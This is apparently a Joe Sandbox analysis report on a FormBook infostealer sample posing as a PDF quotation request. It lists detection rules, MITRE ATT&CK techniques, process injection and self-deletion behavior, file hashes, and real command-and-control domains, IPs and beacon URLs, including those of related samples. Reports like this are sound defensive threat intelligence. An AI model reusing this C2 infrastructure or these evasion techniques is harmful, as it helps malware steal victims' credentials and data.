          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Timestomp1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 532838 Sample: Solicitud urgente de Quotai... Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 9 other signatures 2->43 10 Solicitud urgente de Quotaion_U1197,pdf.exe 3 2->10         started        process3 file4 29 Solicitud urgente ...n_U1197,pdf.exe.log, ASCII 10->29 dropped 13 Solicitud urgente de Quotaion_U1197,pdf.exe 10->13         started        16 Solicitud urgente de Quotaion_U1197,pdf.exe 10->16         started        process5 signatures6 55 Modifies the context of a thread in another process (thread injection) 13->55 57 Maps a DLL or memory area into another process 13->57 59 Sample uses process hollowing technique 13->59 61 Queues an APC in another process (thread injection) 13->61 18 explorer.exe 13->18 injected process7 dnsIp8 31 www.afxwn.icu 156.234.12.248, 49833, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->31 33 www.weqffg.site 162.214.233.244, 49785, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 2 other IPs or domains 18->35 45 System process connects to network (likely due to code injection or exploit) 18->45 22 msdt.exe 18->22         started        signatures9 process10 signatures11 47 Self deletion via cmd delete 22->47 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process12 process13 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Solicitud urgente de Quotaion_U1197,pdf.exe40%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          analytics-at-scale.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.coralxlix.com/c1h5/0%Avira URL Cloudsafe
          http://www.afxwn.icu/c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz0%Avira URL Cloudsafe
          http://www.weqffg.site/c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz100%Avira URL Cloudphishing
          http://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz0%Avira URL Cloudsafe
          https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJ0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.afxwn.icu
          		156.234.12.248
          		truetrue
            		unknown
            www.weqffg.site
            		162.214.233.244
            		truetrue
              		unknown
              analytics-at-scale.com
              		192.0.78.24
              		truetrueunknown
              www.analytics-at-scale.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.coralxlix.com/c1h5/true
                • Avira URL Cloud: safe
                		low
                http://www.afxwn.icu/c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdztrue
                • Avira URL Cloud: safe
                		unknown
                http://www.weqffg.site/c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdztrue
                • Avira URL Cloud: phishing
                		unknown
                http://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdztrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJmsdt.exe, 0000000A.00000002.569235088.0000000004FFF000.00000004.00020000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                192.0.78.24
                		analytics-at-scale.comUnited States
                		2635AUTOMATTICUStrue
                162.214.233.244
                		www.weqffg.siteUnited States
                		46606UNIFIEDLAYER-AS-1UStrue
                156.234.12.248
                		www.afxwn.icuSeychelles
                		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:532838
                Start date:02.12.2021
                Start time:18:37:09
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 53s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:Solicitud urgente de Quotaion_U1197,pdf.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:23
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@9/1@3/3
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 15% (good quality ratio 13.5%)
                • Quality average: 73.8%
                • Quality standard deviation: 31.1%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information

                Simulations

                Behavior and APIs

                TimeTypeDescription
                18:38:08API Interceptor1x Sleep call for process: Solicitud urgente de Quotaion_U1197,pdf.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                192.0.78.24RFQ-18072 QPHN .docGet hashmaliciousBrowse
                • www.eminkoy.com/t3t2/?YTX8m6=X/AHJ1G8CzET27bRNAkcy2zo056pG+X2bUgtrIM6Usdw2LVzhx3zymRQr/cABPSK+z/Wow==&GZS=5jiXYnvXE6
                mtW2HRnhqB.exeGet hashmaliciousBrowse
                • www.kgv-lachswehr.com/ea0r/?fHhDa=c9rlrwb5I0PsvCqZfPZLJ32YxU7lPLK2cV3voPHeBiJjRGf36/O5Za+oFiQ/bs3zoxiOdKVauQ==&2d=SFNDF0m
                hNfqWik7qw.exeGet hashmaliciousBrowse
                • www.amandaznaprawa.com/rht9/?NTiPcP=i488q&2d=oSEpyrDN2jpFtLPZR+/YFKSBf/v8Miz39LE5/YRv+zM0Krg9SxOGQM2eCbJi8hWE+L+z
                BL_CI_PL.exeGet hashmaliciousBrowse
                • www.talkingpoint.tours/n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF
                Dumak Order.xlsxGet hashmaliciousBrowse
                • www.cletechsolutions.com/yrcy/?n2M4s4o=6oj+cRAcOTuW+xdHLRHF0KzLhmFT0afQnvz1X6yVwGfVu9zh+SVYbIJ6SqTa14IOVkDkCg==&zbO=wpf8lJJX
                AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                • www.talkingpoint.tours/n8ds/?9rJT=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&v4VDH=WHU8k4m
                DuxgwH47QB.exeGet hashmaliciousBrowse
                • www.magaliverdonck.com/cfn8/?7ntP2=G2JlCZwhJ8t&wZEhNtn=EAmfM1bZJ66AiKX05l3TaYUgrsfuP/gkLWzderYzqwcOOYaogkVBhIhYz1vuz5d9mKCz
                ORDER.docGet hashmaliciousBrowse
                • www.magaliverdonck.com/cfn8/?r0Dpfv=PV84qbppmxMhmF&etxxAzu=EAmfM1bcJ96Eiab47l3TaYUgrsfuP/gkLWrNCoEyuQcPOp2un0EN3MZawTjo4IJ2zs2EYw==
                Ordre de virement.exeGet hashmaliciousBrowse
                • www.sammaymotivation.com/wrcb/?i6=JRZY7R8EpGxMvUxoU9FjXImHM9r6be3CVb1cEdmzJ1+o3zoDrIbVKOVdp4L7IUQXVHQZ&Vn=5joLnT60H6UtI
                ja71FJcG4X.exeGet hashmaliciousBrowse
                • www.fourjmedia.com/w8n5/?6lPx=Krsevr0fcKdFVj2db+BCLUY6buAyCdOHDU7bdlcHSmOR3oywPLLv+weEBRgOZ5y0K3R+&i2=bZ-LgDohxn7
                31hGtwI4CD.exeGet hashmaliciousBrowse
                • www.givepy.info/s18y/?SF=697MTAEVXvVEXUyAJF20F132oezl1lQlpw2PkmQS81lH+yWLjKrG7SsVWH+sEO7fSxwKD9xmsQ==&7nT=4hfP1hIXyPvt5d80
                rfq.exeGet hashmaliciousBrowse
                • www.faithtruthresolve.com/unzn/?m8a=YX6yD3qjkEh06A43Kvlzsqa1IJGgtNpO3VOCMHkgx/DYA63i6lhcxQdv+JiPSxcNqo3A&-Z=B0G8W4pHG
                sample02.exeGet hashmaliciousBrowse
                • www.practicalmalwareanalysis.com/cc.htm
                6aA9bRxfnl.exeGet hashmaliciousBrowse
                • www.cletechsolutions.com/yrcy/?1bxX=6oj+cRAZOUuS+hRLJRHF0KzLhmFT0afQnvrlL5uU0mfUuMfn5CEUNMx4RP/MxoM9eneU&5j=8pqxuZ4Prl2
                Remittance_advice.exeGet hashmaliciousBrowse
                • www.baroquefolke.com/snr6/?mTZDVrwX=cbil4dbQ85/EoogyOScyzPrFGpGYEkh7zEyo7+xlFpBsIXqPkX0ip4hj/fSsceuRUxVF&Ip=5jUHiDu8uBc
                AWB [EXTERNAL] RFQ-RVS QUOTATION .docGet hashmaliciousBrowse
                • www.fourjmedia.com/w8n5/?c45dyZs=Krsevr0acNdBVz6RZ+BCLUY6buAyCdOHDUjLBmAGWGOQ3Ze2Ibajo0mGC0MYdp2HB0MOmQ==&c8itZ=wRJxjZzxmlSHP2Hp
                ELEGANT MARINE.exeGet hashmaliciousBrowse
                • www.fourjmedia.com/w8n5/?o2JdMD=Krsevr0fcKdFVj2db+BCLUY6buAyCdOHDU7bdlcHSmOR3oywPLLv+weEBRgkGJC0O1Z+&q2JL=nZKHsDQPhRVD1D
                URGENT RFQ.docGet hashmaliciousBrowse
                • www.givepy.info/s18y/?2dGT=697MTAEQXoVAXE+MLF20F132oezl1lQlpwuf4lMT4VlG+D6Nka6KtWUXVh+qcvjXeHEraA==&aL0lqZ=h0G02VRHXrsHxf
                Ekol_LOG_00914,pdf.exeGet hashmaliciousBrowse
                • www.flatironstreeservice.com/dgt9/?bH=DN9ti628iJ60&j4=9BOhy8kblAyJide7ynQBLE+qFSLeuxc/qvallqSEtgcGhdWxOk07eomuMpMdU/GfV2RowavF0Q==
                v54ueAmr6D.exeGet hashmaliciousBrowse
                • www.mainponsel.com/n8cr/?nL0DH=mVFDnNjLroOTVY/e2vMB3+FXNX8eexEZxlQPv7nMWghAxegu28tS6Ss7v6+WYIySqVct&c48dyT=rPYXgR

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                UNIFIEDLAYER-AS-1USOSCBLUS33XXX1032021110200150939.exeGet hashmaliciousBrowse
                • 192.185.224.36
                RFQ - SST#2021111503.exeGet hashmaliciousBrowse
                • 162.241.253.162
                ufKi6DmWMQCuEb4.exeGet hashmaliciousBrowse
                • 192.185.16.241
                counter-1248368226.xlsGet hashmaliciousBrowse
                • 108.179.192.98
                counter-1248368226.xlsGet hashmaliciousBrowse
                • 108.179.192.98
                counter-1248368226.xlsGet hashmaliciousBrowse
                • 108.179.192.98
                counter-1248368226.xlsGet hashmaliciousBrowse
                • 108.179.192.98
                CU-6431 report.xlsmGet hashmaliciousBrowse
                • 162.240.9.126
                CU-6431 report.xlsmGet hashmaliciousBrowse
                • 162.240.9.126
                DkX9HVJTmi.exeGet hashmaliciousBrowse
                • 108.167.135.122
                Shipping report -17420.xlsxGet hashmaliciousBrowse
                • 162.241.169.32
                SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                • 162.240.9.126
                SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                • 162.240.9.126
                INVOICE.exeGet hashmaliciousBrowse
                • 162.214.80.6
                img20048901738_Pago.pdf.exeGet hashmaliciousBrowse
                • 192.185.115.3
                PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                • 162.241.126.156
                PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                • 162.241.126.156
                New order documents. pdf..............exeGet hashmaliciousBrowse
                • 108.179.232.76
                part-1500645108.xlsbGet hashmaliciousBrowse
                • 162.241.62.201
                img20048901740_Pago.pdf.exeGet hashmaliciousBrowse
                • 192.185.115.3
                AUTOMATTICUSRFQ-18072 QPHN .docGet hashmaliciousBrowse
                • 192.0.78.24
                mtW2HRnhqB.exeGet hashmaliciousBrowse
                • 192.0.78.24
                IM-87678A-1A.msiGet hashmaliciousBrowse
                • 192.0.77.32
                hNfqWik7qw.exeGet hashmaliciousBrowse
                • 192.0.78.24
                forensic_challenge(1).htmlGet hashmaliciousBrowse
                • 192.0.77.32
                BL_CI_PL.exeGet hashmaliciousBrowse
                • 192.0.78.24
                PilHb37Gmt.exeGet hashmaliciousBrowse
                • 74.114.154.22
                2A9E7BC07BD4EC39C2BEAA42FF35352BBE6400F899F70.exeGet hashmaliciousBrowse
                • 74.114.154.18
                0A7D966E66CBD260C909DE1D79038C86A071F2F10A810.exeGet hashmaliciousBrowse
                • 74.114.154.18
                6DFD902231E6AA1301C11ECA21F5A29456AA020BFE1EB.exeGet hashmaliciousBrowse
                • 74.114.154.22
                B10274561191CEDB0B16D2A69FDCD4E5062EDFE262184.exeGet hashmaliciousBrowse
                • 74.114.154.18
                Dumak Order.xlsxGet hashmaliciousBrowse
                • 192.0.78.24
                uSD1d8nRJ0.exeGet hashmaliciousBrowse
                • 192.0.78.248
                PO P232-2111228.xlsxGet hashmaliciousBrowse
                • 192.0.78.25
                PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                • 192.0.78.25
                fpvN6iDp5r.msiGet hashmaliciousBrowse
                • 192.0.77.32
                Zr26f1rL6r.exeGet hashmaliciousBrowse
                • 192.0.78.25
                2sX7IceYWM.msiGet hashmaliciousBrowse
                • 192.0.77.32
                vbc.exeGet hashmaliciousBrowse
                • 192.0.78.25
                162AB00C0E943F9548B04F3437867508656480585369C.exeGet hashmaliciousBrowse
                • 74.114.154.18

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Solicitud urgente de Quotaion_U1197,pdf.exe.log
                Process:C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1310
                Entropy (8bit):5.345651901398759
                Encrypted:false
                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                MD5:D918C6A765EDB90D2A227FE23A3FEC98
                SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                Malicious:true
                Reputation:moderate, very likely benign file
                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.69240335411092
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:Solicitud urgente de Quotaion_U1197,pdf.exe
                File size:456192
                MD5:985db7fdfcf2aa38a0b75c22f06b2756
                SHA1:5f51dec30f3a649fc49e95e3421bc247cf9c40c7
                SHA256:6e4323460316f29ecdaa2b49fbe733c11ea3a040cf7336e177ac9345ddac21c1
                SHA512:469037a46ca39a8540b81bc18016058d170f99ba98707883b3a4c0a1c9a3a4b84fe2f849765b17c7e8387db13ca1d96148abda2a676d688b6b1f0a1c062a063d
                SSDEEP:6144:h3j2kQqvZRHs/KTAva0AfvzIBOU5LrBhtIMiHDrH03S0NJQeEv6si/c5U/TU1zN1:101NBxRrPtIhjrUi+QzRoTU1zNBjf
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.......................J......N.... ........@.. .......................`............@................................

                File Icon

                Icon Hash:94ba3a92e98cb6c8

                Static PE Info

                General

                Entrypoint:0x46c94e
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0xD47F48BF [Mon Dec 21 20:44:47 2082 UTC]
                TLS Callbacks:
                CLR (.Net) Version:v4.0.30319
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
